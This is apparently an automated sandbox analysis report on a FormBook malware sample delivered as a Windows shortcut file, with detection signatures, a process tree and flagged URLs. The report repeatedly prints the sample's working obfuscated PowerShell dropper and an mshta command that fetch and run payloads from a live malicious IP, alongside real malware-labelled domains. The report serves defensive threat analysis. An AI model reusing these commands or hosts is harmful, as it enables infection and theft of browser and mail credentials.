Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Offer Document 24.lnk

Overview

General Information

Sample name:Offer Document 24.lnk
Analysis ID:1446727
MD5:bf9569f5e56e6dcb1f4ae60fd2faea36
SHA1:1085e4140bf323df085db50b8f79c3b02b4aab72
SHA256:59f149ffc55554ce0aac7072bba999b5abb83b023486e017f407883f8a27e4e2
Tags:lnk
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected FormBook
AI detected suspicious sample
Found URL in windows shortcut file (LNK)
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 5872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7268 cmdline: "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rooma.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Roaming\rooma.exe" MD5: 1DCCE19E1A6306424D073487AF821FF0)
          • TmjHHkXnMrncRmISMzN.exe (PID: 4472 cmdline: "C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • netbtugc.exe (PID: 7792 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
              • TmjHHkXnMrncRmISMzN.exe (PID: 3780 cmdline: "C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 8128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 7576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries
        SourceRuleDescriptionAuthorStrings
        7.2.rooma.exe.9b0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.rooma.exe.9b0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          System Summary

          barindex
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta, CommandLine: "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta, ProcessId: 7268, ProcessName: mshta.exe
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7388, TargetFilename: C:\Users\user\AppData\Roaming\rooma.exe
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta', ProcessId: 5872, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7576, ProcessName: svchost.exe
          Timestamp:05/23/24-20:20:12.581519
          SID:2024449
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:Attempted User Privilege Gain

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Offer Document 24.lnkAvira: detected
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnRAvira URL Cloud: Label: malware
          Source: http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==Avira URL Cloud: Label: malware
          Source: http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPLAvira URL Cloud: Label: malware
          Source: http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==Avira URL Cloud: Label: malware
          Source: http://www.empowermedeco.com/fo8o/Avira URL Cloud: Label: malware
          Source: http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPLAvira URL Cloud: Label: malware
          Source: http://www.magmadokum.com/fo8o/Avira URL Cloud: Label: malware
          Source: http://www.660danm.top/fo8o/Avira URL Cloud: Label: malware
          Source: http://www.kasegitai.tokyo/fo8o/Avira URL Cloud: Label: malware
          Source: http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q==Avira URL Cloud: Label: malware
          Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
          Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: phishing
